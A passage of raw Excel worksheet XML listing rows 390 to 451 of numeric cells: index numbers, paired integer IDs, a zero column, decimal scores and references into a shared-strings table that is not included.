      </c>
      <c r="G390" t="s">
        <v>777</v>
      </c>
      <c r="H390" t="s">
        <v>778</v>
      </c>
    </row>
    <row r="391" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A391" s="1">
        <v>389</v>
      </c>
      <c r="B391">
        <v>4743</v>
      </c>
      <c r="C391">
        <v>4743</v>
      </c>
      <c r="D391">
        <v>0</v>
      </c>
      <c r="E391">
        <v>0.98739999532699585</v>
      </c>
      <c r="F391" t="s">
        <v>7</v>
      </c>
      <c r="G391" t="s">
        <v>779</v>
      </c>
      <c r="H391" t="s">
        <v>780</v>
      </c>
    </row>
    <row r="392" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A392" s="1">
        <v>390</v>
      </c>
      <c r="B392">
        <v>4742</v>
      </c>
      <c r="C392">
        <v>4742</v>
      </c>
      <c r="D392">
        <v>0</v>
      </c>
      <c r="E392">
        <v>0.72850000858306885</v>
      </c>
      <c r="F392" t="s">
        <v>7</v>
      </c>
      <c r="G392" t="s">
        <v>781</v>
      </c>
      <c r="H392" t="s">
        <v>782</v>
      </c>
    </row>
    <row r="393" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A393" s="1">
        <v>391</v>
      </c>
      <c r="B393">
        <v>7231</v>
      </c>
      <c r="C393">
        <v>7231</v>
      </c>
      <c r="D393">
        <v>0</v>
      </c>
      <c r="E393">
        <v>0.92849999666213989</v>
      </c>
      <c r="F393" t="s">
        <v>7</v>
      </c>
      <c r="G393" t="s">
        <v>783</v>
      </c>
      <c r="H393" t="s">
        <v>784</v>
      </c>
    </row>
    <row r="394" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A394" s="1">
        <v>392</v>
      </c>
      <c r="B394">
        <v>4737</v>
      </c>
      <c r="C394">
        <v>4737</v>
      </c>
      <c r="D394">
        <v>0</v>
      </c>
      <c r="E394">
        <v>0.89010000228881836</v>
      </c>
      <c r="F394" t="s">
        <v>7</v>
      </c>
      <c r="G394" t="s">
        <v>785</v>
      </c>
      <c r="H394" t="s">
        <v>786</v>
      </c>
    </row>
    <row r="395" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A395" s="1">
        <v>393</v>
      </c>
      <c r="B395">
        <v>1544</v>
      </c>
      <c r="C395">
        <v>1544</v>
      </c>
      <c r="D395">
        <v>0</v>
      </c>
      <c r="E395">
        <v>0.73760002851486206</v>
      </c>
      <c r="F395" t="s">
        <v>7</v>
      </c>
      <c r="G395" t="s">
        <v>787</v>
      </c>
      <c r="H395" t="s">
        <v>788</v>
      </c>
    </row>
    <row r="396" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A396" s="1">
        <v>394</v>
      </c>
      <c r="B396">
        <v>7230</v>
      </c>
      <c r="C396">
        <v>7230</v>
      </c>
      <c r="D396">
        <v>0</v>
      </c>
      <c r="E396">
        <v>0.39259999990463262</v>
      </c>
      <c r="F396" t="s">
        <v>7</v>
      </c>
      <c r="G396" t="s">
        <v>789</v>
      </c>
      <c r="H396" t="s">
        <v>790</v>
      </c>
    </row>
    <row r="397" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A397" s="1">
        <v>395</v>
      </c>
      <c r="B397">
        <v>1546</v>
      </c>
      <c r="C397">
        <v>1546</v>
      </c>
      <c r="D397">
        <v>0</v>
      </c>
      <c r="E397">
        <v>0.53930002450942993</v>
      </c>
      <c r="F397" t="s">
        <v>7</v>
      </c>
      <c r="G397" t="s">
        <v>791</v>
      </c>
      <c r="H397" t="s">
        <v>792</v>
      </c>
    </row>
    <row r="398" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A398" s="1">
        <v>396</v>
      </c>
      <c r="B398">
        <v>1547</v>
      </c>
      <c r="C398">
        <v>1547</v>
      </c>
      <c r="D398">
        <v>0</v>
      </c>
      <c r="E398">
        <v>0.98979997634887695</v>
      </c>
      <c r="F398" t="s">
        <v>7</v>
      </c>
      <c r="G398" t="s">
        <v>793</v>
      </c>
      <c r="H398" t="s">
        <v>794</v>
      </c>
    </row>
    <row r="399" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A399" s="1">
        <v>397</v>
      </c>
      <c r="B399">
        <v>4735</v>
      </c>
      <c r="C399">
        <v>4735</v>
      </c>
      <c r="D399">
        <v>0</v>
      </c>
      <c r="E399">
        <v>0.88529998064041138</v>
      </c>
      <c r="F399" t="s">
        <v>7</v>
      </c>
      <c r="G399" t="s">
        <v>795</v>
      </c>
      <c r="H399" t="s">
        <v>796</v>
      </c>
    </row>
    <row r="400" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A400" s="1">
        <v>398</v>
      </c>
      <c r="B400">
        <v>1549</v>
      </c>
      <c r="C400">
        <v>1549</v>
      </c>
      <c r="D400">
        <v>0</v>
      </c>
      <c r="E400">
        <v>0.5591999888420105</v>
      </c>
      <c r="F400" t="s">
        <v>7</v>
      </c>
      <c r="G400" t="s">
        <v>797</v>
      </c>
      <c r="H400" t="s">
        <v>798</v>
      </c>
    </row>
    <row r="401" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A401" s="1">
        <v>399</v>
      </c>
      <c r="B401">
        <v>4734</v>
      </c>
      <c r="C401">
        <v>4734</v>
      </c>
      <c r="D401">
        <v>0</v>
      </c>
      <c r="E401">
        <v>0.9968000054359436</v>
      </c>
      <c r="F401" t="s">
        <v>7</v>
      </c>
      <c r="G401" t="s">
        <v>799</v>
      </c>
      <c r="H401" t="s">
        <v>800</v>
      </c>
    </row>
    <row r="402" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A402" s="1">
        <v>400</v>
      </c>
      <c r="B402">
        <v>1551</v>
      </c>
      <c r="C402">
        <v>1551</v>
      </c>
      <c r="D402">
        <v>0</v>
      </c>
      <c r="E402">
        <v>0.86949998140335083</v>
      </c>
      <c r="F402" t="s">
        <v>7</v>
      </c>
      <c r="G402" t="s">
        <v>801</v>
      </c>
      <c r="H402" t="s">
        <v>802</v>
      </c>
    </row>
    <row r="403" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A403" s="1">
        <v>401</v>
      </c>
      <c r="B403">
        <v>1435</v>
      </c>
      <c r="C403">
        <v>1435</v>
      </c>
      <c r="D403">
        <v>0</v>
      </c>
      <c r="E403">
        <v>0.99529999494552612</v>
      </c>
      <c r="F403" t="s">
        <v>7</v>
      </c>
      <c r="G403" t="s">
        <v>803</v>
      </c>
      <c r="H403" t="s">
        <v>804</v>
      </c>
    </row>
    <row r="404" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A404" s="1">
        <v>402</v>
      </c>
      <c r="B404">
        <v>1578</v>
      </c>
      <c r="C404">
        <v>1578</v>
      </c>
      <c r="D404">
        <v>0</v>
      </c>
      <c r="E404">
        <v>0.61260002851486206</v>
      </c>
      <c r="F404" t="s">
        <v>7</v>
      </c>
      <c r="G404" t="s">
        <v>805</v>
      </c>
      <c r="H404" t="s">
        <v>806</v>
      </c>
    </row>
    <row r="405" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A405" s="1">
        <v>403</v>
      </c>
      <c r="B405">
        <v>4786</v>
      </c>
      <c r="C405">
        <v>4786</v>
      </c>
      <c r="D405">
        <v>0</v>
      </c>
      <c r="E405">
        <v>0.86299997568130493</v>
      </c>
      <c r="F405" t="s">
        <v>7</v>
      </c>
      <c r="G405" t="s">
        <v>807</v>
      </c>
      <c r="H405" t="s">
        <v>808</v>
      </c>
    </row>
    <row r="406" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A406" s="1">
        <v>404</v>
      </c>
      <c r="B406">
        <v>4788</v>
      </c>
      <c r="C406">
        <v>4788</v>
      </c>
      <c r="D406">
        <v>0</v>
      </c>
      <c r="E406">
        <v>0.82309997081756592</v>
      </c>
      <c r="F406" t="s">
        <v>7</v>
      </c>
      <c r="G406" t="s">
        <v>809</v>
      </c>
      <c r="H406" t="s">
        <v>810</v>
      </c>
    </row>
    <row r="407" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A407" s="1">
        <v>405</v>
      </c>
      <c r="B407">
        <v>1333</v>
      </c>
      <c r="C407">
        <v>1333</v>
      </c>
      <c r="D407">
        <v>0</v>
      </c>
      <c r="E407">
        <v>0.71340000629425049</v>
      </c>
      <c r="F407" t="s">
        <v>7</v>
      </c>
      <c r="G407" t="s">
        <v>811</v>
      </c>
      <c r="H407" t="s">
        <v>812</v>
      </c>
    </row>
    <row r="408" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A408" s="1">
        <v>406</v>
      </c>
      <c r="B408">
        <v>7311</v>
      </c>
      <c r="C408">
        <v>7311</v>
      </c>
      <c r="D408">
        <v>0</v>
      </c>
      <c r="E408">
        <v>0.99629998207092285</v>
      </c>
      <c r="F408" t="s">
        <v>7</v>
      </c>
      <c r="G408" t="s">
        <v>813</v>
      </c>
      <c r="H408" t="s">
        <v>814</v>
      </c>
    </row>
    <row r="409" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A409" s="1">
        <v>407</v>
      </c>
      <c r="B409">
        <v>4843</v>
      </c>
      <c r="C409">
        <v>4843</v>
      </c>
      <c r="D409">
        <v>0</v>
      </c>
      <c r="E409">
        <v>0.61580002307891846</v>
      </c>
      <c r="F409" t="s">
        <v>7</v>
      </c>
      <c r="G409" t="s">
        <v>815</v>
      </c>
      <c r="H409" t="s">
        <v>816</v>
      </c>
    </row>
    <row r="410" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A410" s="1">
        <v>408</v>
      </c>
      <c r="B410">
        <v>5879</v>
      </c>
      <c r="C410">
        <v>5879</v>
      </c>
      <c r="D410">
        <v>0</v>
      </c>
      <c r="E410">
        <v>0.99479997158050537</v>
      </c>
      <c r="F410" t="s">
        <v>7</v>
      </c>
      <c r="G410" t="s">
        <v>817</v>
      </c>
      <c r="H410" t="s">
        <v>818</v>
      </c>
    </row>
    <row r="411" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A411" s="1">
        <v>409</v>
      </c>
      <c r="B411">
        <v>4839</v>
      </c>
      <c r="C411">
        <v>4839</v>
      </c>
      <c r="D411">
        <v>0</v>
      </c>
      <c r="E411">
        <v>0.71609997749328613</v>
      </c>
      <c r="F411" t="s">
        <v>7</v>
      </c>
      <c r="G411" t="s">
        <v>819</v>
      </c>
      <c r="H411" t="s">
        <v>820</v>
      </c>
    </row>
    <row r="412" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A412" s="1">
        <v>410</v>
      </c>
      <c r="B412">
        <v>7304</v>
      </c>
      <c r="C412">
        <v>7304</v>
      </c>
      <c r="D412">
        <v>0</v>
      </c>
      <c r="E412">
        <v>0.98949998617172241</v>
      </c>
      <c r="F412" t="s">
        <v>7</v>
      </c>
      <c r="G412" t="s">
        <v>821</v>
      </c>
      <c r="H412" t="s">
        <v>822</v>
      </c>
    </row>
    <row r="413" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A413" s="1">
        <v>411</v>
      </c>
      <c r="B413">
        <v>1344</v>
      </c>
      <c r="C413">
        <v>1344</v>
      </c>
      <c r="D413">
        <v>0</v>
      </c>
      <c r="E413">
        <v>0.46160000562667852</v>
      </c>
      <c r="F413" t="s">
        <v>7</v>
      </c>
      <c r="G413" t="s">
        <v>823</v>
      </c>
      <c r="H413" t="s">
        <v>824</v>
      </c>
    </row>
    <row r="414" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A414" s="1">
        <v>412</v>
      </c>
      <c r="B414">
        <v>1332</v>
      </c>
      <c r="C414">
        <v>1332</v>
      </c>
      <c r="D414">
        <v>0</v>
      </c>
      <c r="E414">
        <v>0.42629998922348022</v>
      </c>
      <c r="F414" t="s">
        <v>7</v>
      </c>
      <c r="G414" t="s">
        <v>825</v>
      </c>
      <c r="H414" t="s">
        <v>826</v>
      </c>
    </row>
    <row r="415" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A415" s="1">
        <v>413</v>
      </c>
      <c r="B415">
        <v>5882</v>
      </c>
      <c r="C415">
        <v>5882</v>
      </c>
      <c r="D415">
        <v>0</v>
      </c>
      <c r="E415">
        <v>0.77350002527236938</v>
      </c>
      <c r="F415" t="s">
        <v>7</v>
      </c>
      <c r="G415" t="s">
        <v>827</v>
      </c>
      <c r="H415" t="s">
        <v>828</v>
      </c>
    </row>
    <row r="416" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A416" s="1">
        <v>414</v>
      </c>
      <c r="B416">
        <v>4831</v>
      </c>
      <c r="C416">
        <v>4831</v>
      </c>
      <c r="D416">
        <v>0</v>
      </c>
      <c r="E416">
        <v>0.49399998784065252</v>
      </c>
      <c r="F416" t="s">
        <v>7</v>
      </c>
      <c r="G416" t="s">
        <v>829</v>
      </c>
      <c r="H416" t="s">
        <v>830</v>
      </c>
    </row>
    <row r="417" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A417" s="1">
        <v>415</v>
      </c>
      <c r="B417">
        <v>5884</v>
      </c>
      <c r="C417">
        <v>5884</v>
      </c>
      <c r="D417">
        <v>0</v>
      </c>
      <c r="E417">
        <v>0.76160001754760742</v>
      </c>
      <c r="F417" t="s">
        <v>7</v>
      </c>
      <c r="G417" t="s">
        <v>831</v>
      </c>
      <c r="H417" t="s">
        <v>832</v>
      </c>
    </row>
    <row r="418" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A418" s="1">
        <v>416</v>
      </c>
      <c r="B418">
        <v>5892</v>
      </c>
      <c r="C418">
        <v>5892</v>
      </c>
      <c r="D418">
        <v>0</v>
      </c>
      <c r="E418">
        <v>0.53789997100830078</v>
      </c>
      <c r="F418" t="s">
        <v>7</v>
      </c>
      <c r="G418" t="s">
        <v>833</v>
      </c>
      <c r="H418" t="s">
        <v>834</v>
      </c>
    </row>
    <row r="419" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A419" s="1">
        <v>417</v>
      </c>
      <c r="B419">
        <v>4817</v>
      </c>
      <c r="C419">
        <v>4817</v>
      </c>
      <c r="D419">
        <v>0</v>
      </c>
      <c r="E419">
        <v>0.46939998865127558</v>
      </c>
      <c r="F419" t="s">
        <v>7</v>
      </c>
      <c r="G419" t="s">
        <v>835</v>
      </c>
      <c r="H419" t="s">
        <v>836</v>
      </c>
    </row>
    <row r="420" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A420" s="1">
        <v>418</v>
      </c>
      <c r="B420">
        <v>4814</v>
      </c>
      <c r="C420">
        <v>4814</v>
      </c>
      <c r="D420">
        <v>0</v>
      </c>
      <c r="E420">
        <v>0.85119998455047607</v>
      </c>
      <c r="F420" t="s">
        <v>7</v>
      </c>
      <c r="G420" t="s">
        <v>837</v>
      </c>
      <c r="H420" t="s">
        <v>838</v>
      </c>
    </row>
    <row r="421" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A421" s="1">
        <v>419</v>
      </c>
      <c r="B421">
        <v>4811</v>
      </c>
      <c r="C421">
        <v>4811</v>
      </c>
      <c r="D421">
        <v>0</v>
      </c>
      <c r="E421">
        <v>0.94999998807907104</v>
      </c>
      <c r="F421" t="s">
        <v>7</v>
      </c>
      <c r="G421" t="s">
        <v>839</v>
      </c>
      <c r="H421" t="s">
        <v>840</v>
      </c>
    </row>
    <row r="422" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A422" s="1">
        <v>420</v>
      </c>
      <c r="B422">
        <v>1371</v>
      </c>
      <c r="C422">
        <v>1371</v>
      </c>
      <c r="D422">
        <v>0</v>
      </c>
      <c r="E422">
        <v>0.56529998779296875</v>
      </c>
      <c r="F422" t="s">
        <v>7</v>
      </c>
      <c r="G422" t="s">
        <v>841</v>
      </c>
      <c r="H422" t="s">
        <v>842</v>
      </c>
    </row>
    <row r="423" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A423" s="1">
        <v>421</v>
      </c>
      <c r="B423">
        <v>1347</v>
      </c>
      <c r="C423">
        <v>1347</v>
      </c>
      <c r="D423">
        <v>0</v>
      </c>
      <c r="E423">
        <v>0.99900001287460327</v>
      </c>
      <c r="F423" t="s">
        <v>7</v>
      </c>
      <c r="G423" t="s">
        <v>843</v>
      </c>
      <c r="H423" t="s">
        <v>844</v>
      </c>
    </row>
    <row r="424" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A424" s="1">
        <v>422</v>
      </c>
      <c r="B424">
        <v>4810</v>
      </c>
      <c r="C424">
        <v>4810</v>
      </c>
      <c r="D424">
        <v>0</v>
      </c>
      <c r="E424">
        <v>0.99430000782012939</v>
      </c>
      <c r="F424" t="s">
        <v>7</v>
      </c>
      <c r="G424" t="s">
        <v>845</v>
      </c>
      <c r="H424" t="s">
        <v>846</v>
      </c>
    </row>
    <row r="425" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A425" s="1">
        <v>423</v>
      </c>
      <c r="B425">
        <v>1329</v>
      </c>
      <c r="C425">
        <v>1329</v>
      </c>
      <c r="D425">
        <v>0</v>
      </c>
      <c r="E425">
        <v>0.53140002489089966</v>
      </c>
      <c r="F425" t="s">
        <v>7</v>
      </c>
      <c r="G425" t="s">
        <v>847</v>
      </c>
      <c r="H425" t="s">
        <v>848</v>
      </c>
    </row>
    <row r="426" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A426" s="1">
        <v>424</v>
      </c>
      <c r="B426">
        <v>1323</v>
      </c>
      <c r="C426">
        <v>1323</v>
      </c>
      <c r="D426">
        <v>0</v>
      </c>
      <c r="E426">
        <v>0.51080000400543213</v>
      </c>
      <c r="F426" t="s">
        <v>7</v>
      </c>
      <c r="G426" t="s">
        <v>849</v>
      </c>
      <c r="H426" t="s">
        <v>850</v>
      </c>
    </row>
    <row r="427" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A427" s="1">
        <v>425</v>
      </c>
      <c r="B427">
        <v>7317</v>
      </c>
      <c r="C427">
        <v>7317</v>
      </c>
      <c r="D427">
        <v>0</v>
      </c>
      <c r="E427">
        <v>0.67699998617172241</v>
      </c>
      <c r="F427" t="s">
        <v>7</v>
      </c>
      <c r="G427" t="s">
        <v>851</v>
      </c>
      <c r="H427" t="s">
        <v>852</v>
      </c>
    </row>
    <row r="428" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A428" s="1">
        <v>426</v>
      </c>
      <c r="B428">
        <v>1303</v>
      </c>
      <c r="C428">
        <v>1303</v>
      </c>
      <c r="D428">
        <v>0</v>
      </c>
      <c r="E428">
        <v>0.50950002670288086</v>
      </c>
      <c r="F428" t="s">
        <v>7</v>
      </c>
      <c r="G428" t="s">
        <v>853</v>
      </c>
      <c r="H428" t="s">
        <v>854</v>
      </c>
    </row>
    <row r="429" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A429" s="1">
        <v>427</v>
      </c>
      <c r="B429">
        <v>5871</v>
      </c>
      <c r="C429">
        <v>5871</v>
      </c>
      <c r="D429">
        <v>0</v>
      </c>
      <c r="E429">
        <v>0.74730002880096436</v>
      </c>
      <c r="F429" t="s">
        <v>7</v>
      </c>
      <c r="G429" t="s">
        <v>855</v>
      </c>
      <c r="H429" t="s">
        <v>856</v>
      </c>
    </row>
    <row r="430" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A430" s="1">
        <v>428</v>
      </c>
      <c r="B430">
        <v>1306</v>
      </c>
      <c r="C430">
        <v>1306</v>
      </c>
      <c r="D430">
        <v>0</v>
      </c>
      <c r="E430">
        <v>0.99220001697540283</v>
      </c>
      <c r="F430" t="s">
        <v>7</v>
      </c>
      <c r="G430" t="s">
        <v>857</v>
      </c>
      <c r="H430" t="s">
        <v>858</v>
      </c>
    </row>
    <row r="431" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A431" s="1">
        <v>429</v>
      </c>
      <c r="B431">
        <v>1309</v>
      </c>
      <c r="C431">
        <v>1309</v>
      </c>
      <c r="D431">
        <v>0</v>
      </c>
      <c r="E431">
        <v>0.99250000715255737</v>
      </c>
      <c r="F431" t="s">
        <v>7</v>
      </c>
      <c r="G431" t="s">
        <v>859</v>
      </c>
      <c r="H431" t="s">
        <v>860</v>
      </c>
    </row>
    <row r="432" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A432" s="1">
        <v>430</v>
      </c>
      <c r="B432">
        <v>7314</v>
      </c>
      <c r="C432">
        <v>7314</v>
      </c>
      <c r="D432">
        <v>0</v>
      </c>
      <c r="E432">
        <v>0.64600002765655518</v>
      </c>
      <c r="F432" t="s">
        <v>7</v>
      </c>
      <c r="G432" t="s">
        <v>861</v>
      </c>
      <c r="H432" t="s">
        <v>862</v>
      </c>
    </row>
    <row r="433" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A433" s="1">
        <v>431</v>
      </c>
      <c r="B433">
        <v>7313</v>
      </c>
      <c r="C433">
        <v>7313</v>
      </c>
      <c r="D433">
        <v>0</v>
      </c>
      <c r="E433">
        <v>0.96340000629425049</v>
      </c>
      <c r="F433" t="s">
        <v>7</v>
      </c>
      <c r="G433" t="s">
        <v>863</v>
      </c>
      <c r="H433" t="s">
        <v>864</v>
      </c>
    </row>
    <row r="434" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A434" s="1">
        <v>432</v>
      </c>
      <c r="B434">
        <v>5873</v>
      </c>
      <c r="C434">
        <v>5873</v>
      </c>
      <c r="D434">
        <v>0</v>
      </c>
      <c r="E434">
        <v>0.50499999523162842</v>
      </c>
      <c r="F434" t="s">
        <v>7</v>
      </c>
      <c r="G434" t="s">
        <v>865</v>
      </c>
      <c r="H434" t="s">
        <v>866</v>
      </c>
    </row>
    <row r="435" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A435" s="1">
        <v>433</v>
      </c>
      <c r="B435">
        <v>1312</v>
      </c>
      <c r="C435">
        <v>1312</v>
      </c>
      <c r="D435">
        <v>0</v>
      </c>
      <c r="E435">
        <v>0.99709999561309814</v>
      </c>
      <c r="F435" t="s">
        <v>7</v>
      </c>
      <c r="G435" t="s">
        <v>867</v>
      </c>
      <c r="H435" t="s">
        <v>868</v>
      </c>
    </row>
    <row r="436" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A436" s="1">
        <v>434</v>
      </c>
      <c r="B436">
        <v>1316</v>
      </c>
      <c r="C436">
        <v>1316</v>
      </c>
      <c r="D436">
        <v>0</v>
      </c>
      <c r="E436">
        <v>0.67229998111724854</v>
      </c>
      <c r="F436" t="s">
        <v>7</v>
      </c>
      <c r="G436" t="s">
        <v>869</v>
      </c>
      <c r="H436" t="s">
        <v>870</v>
      </c>
    </row>
    <row r="437" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A437" s="1">
        <v>435</v>
      </c>
      <c r="B437">
        <v>1317</v>
      </c>
      <c r="C437">
        <v>1317</v>
      </c>
      <c r="D437">
        <v>0</v>
      </c>
      <c r="E437">
        <v>0.98009997606277466</v>
      </c>
      <c r="F437" t="s">
        <v>7</v>
      </c>
      <c r="G437" t="s">
        <v>871</v>
      </c>
      <c r="H437" t="s">
        <v>872</v>
      </c>
    </row>
    <row r="438" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A438" s="1">
        <v>436</v>
      </c>
      <c r="B438">
        <v>1318</v>
      </c>
      <c r="C438">
        <v>1318</v>
      </c>
      <c r="D438">
        <v>0</v>
      </c>
      <c r="E438">
        <v>0.9528999924659729</v>
      </c>
      <c r="F438" t="s">
        <v>7</v>
      </c>
      <c r="G438" t="s">
        <v>873</v>
      </c>
      <c r="H438" t="s">
        <v>874</v>
      </c>
    </row>
    <row r="439" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A439" s="1">
        <v>437</v>
      </c>
      <c r="B439">
        <v>1319</v>
      </c>
      <c r="C439">
        <v>1319</v>
      </c>
      <c r="D439">
        <v>0</v>
      </c>
      <c r="E439">
        <v>0.99650001525878906</v>
      </c>
      <c r="F439" t="s">
        <v>7</v>
      </c>
      <c r="G439" t="s">
        <v>875</v>
      </c>
      <c r="H439" t="s">
        <v>876</v>
      </c>
    </row>
    <row r="440" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A440" s="1">
        <v>438</v>
      </c>
      <c r="B440">
        <v>1320</v>
      </c>
      <c r="C440">
        <v>1320</v>
      </c>
      <c r="D440">
        <v>0</v>
      </c>
      <c r="E440">
        <v>0.99830001592636108</v>
      </c>
      <c r="F440" t="s">
        <v>7</v>
      </c>
      <c r="G440" t="s">
        <v>877</v>
      </c>
      <c r="H440" t="s">
        <v>878</v>
      </c>
    </row>
    <row r="441" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A441" s="1">
        <v>439</v>
      </c>
      <c r="B441">
        <v>1321</v>
      </c>
      <c r="C441">
        <v>1321</v>
      </c>
      <c r="D441">
        <v>0</v>
      </c>
      <c r="E441">
        <v>0.99650001525878906</v>
      </c>
      <c r="F441" t="s">
        <v>7</v>
      </c>
      <c r="G441" t="s">
        <v>879</v>
      </c>
      <c r="H441" t="s">
        <v>880</v>
      </c>
    </row>
    <row r="442" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A442" s="1">
        <v>440</v>
      </c>
      <c r="B442">
        <v>5872</v>
      </c>
      <c r="C442">
        <v>5872</v>
      </c>
      <c r="D442">
        <v>0</v>
      </c>
      <c r="E442">
        <v>0.75110000371932983</v>
      </c>
      <c r="F442" t="s">
        <v>7</v>
      </c>
      <c r="G442" t="s">
        <v>881</v>
      </c>
      <c r="H442" t="s">
        <v>882</v>
      </c>
    </row>
    <row r="443" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A443" s="1">
        <v>441</v>
      </c>
      <c r="B443">
        <v>4852</v>
      </c>
      <c r="C443">
        <v>4852</v>
      </c>
      <c r="D443">
        <v>0</v>
      </c>
      <c r="E443">
        <v>0.9749000072479248</v>
      </c>
      <c r="F443" t="s">
        <v>7</v>
      </c>
      <c r="G443" t="s">
        <v>883</v>
      </c>
      <c r="H443" t="s">
        <v>884</v>
      </c>
    </row>
    <row r="444" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A444" s="1">
        <v>442</v>
      </c>
      <c r="B444">
        <v>1373</v>
      </c>
      <c r="C444">
        <v>1373</v>
      </c>
      <c r="D444">
        <v>0</v>
      </c>
      <c r="E444">
        <v>0.74910002946853638</v>
      </c>
      <c r="F444" t="s">
        <v>7</v>
      </c>
      <c r="G444" t="s">
        <v>885</v>
      </c>
      <c r="H444" t="s">
        <v>886</v>
      </c>
    </row>
    <row r="445" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A445" s="1">
        <v>443</v>
      </c>
      <c r="B445">
        <v>4809</v>
      </c>
      <c r="C445">
        <v>4809</v>
      </c>
      <c r="D445">
        <v>0</v>
      </c>
      <c r="E445">
        <v>0.64819997549057007</v>
      </c>
      <c r="F445" t="s">
        <v>7</v>
      </c>
      <c r="G445" t="s">
        <v>887</v>
      </c>
      <c r="H445" t="s">
        <v>888</v>
      </c>
    </row>
    <row r="446" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A446" s="1">
        <v>444</v>
      </c>
      <c r="B446">
        <v>1375</v>
      </c>
      <c r="C446">
        <v>1375</v>
      </c>
      <c r="D446">
        <v>0</v>
      </c>
      <c r="E446">
        <v>0.51490002870559692</v>
      </c>
      <c r="F446" t="s">
        <v>7</v>
      </c>
      <c r="G446" t="s">
        <v>889</v>
      </c>
      <c r="H446" t="s">
        <v>890</v>
      </c>
    </row>
    <row r="447" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A447" s="1">
        <v>445</v>
      </c>
      <c r="B447">
        <v>4794</v>
      </c>
      <c r="C447">
        <v>4794</v>
      </c>
      <c r="D447">
        <v>0</v>
      </c>
      <c r="E447">
        <v>0.98390001058578491</v>
      </c>
      <c r="F447" t="s">
        <v>7</v>
      </c>
      <c r="G447" t="s">
        <v>891</v>
      </c>
      <c r="H447" t="s">
        <v>892</v>
      </c>
    </row>
    <row r="448" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A448" s="1">
        <v>446</v>
      </c>
      <c r="B448">
        <v>1412</v>
      </c>
      <c r="C448">
        <v>1412</v>
      </c>
      <c r="D448">
        <v>0</v>
      </c>
      <c r="E448">
        <v>0.67220002412796021</v>
      </c>
      <c r="F448" t="s">
        <v>7</v>
      </c>
      <c r="G448" t="s">
        <v>893</v>
      </c>
      <c r="H448" t="s">
        <v>894</v>
      </c>
    </row>
    <row r="449" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A449" s="1">
        <v>447</v>
      </c>
      <c r="B449">
        <v>5897</v>
      </c>
      <c r="C449">
        <v>5897</v>
      </c>
      <c r="D449">
        <v>0</v>
      </c>
      <c r="E449">
        <v>0.71369999647140503</v>
      </c>
      <c r="F449" t="s">
        <v>7</v>
      </c>
      <c r="G449" t="s">
        <v>895</v>
      </c>
      <c r="H449" t="s">
        <v>896</v>
      </c>
    </row>
    <row r="450" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A450" s="1">
        <v>448</v>
      </c>
      <c r="B450">
        <v>1414</v>
      </c>
      <c r="C450">
        <v>1414</v>
      </c>
      <c r="D450">
        <v>0</v>
      </c>
      <c r="E450">
        <v>0.98979997634887695</v>
      </c>
      <c r="F450" t="s">
        <v>7</v>
      </c>
      <c r="G450" t="s">
        <v>897</v>
      </c>
      <c r="H450" t="s">
        <v>898</v>
      </c>
    </row>
    <row r="451" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A451" s="1">
        <v>449</v>
      </c>
      <c r="B451">
        <v>1415</v>
      </c>
      <c r="C451">
        <v>1415</v>
      </c>
      <c r="D451">
        <v>0</v>
      </c>
      <c r="E451">
        <v>0.99919998645782471</v>
      </c>
      <c r="F451" t="s">
        <v>7</v>
      </c>
      <c r="G451" t="s">
        <v>899</v>
      </c>
      <c r="H451" t="s">
        <v>900</v>
      </c>
    </row>
    <row r="452" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A452" s="1">
        <v>450</v>
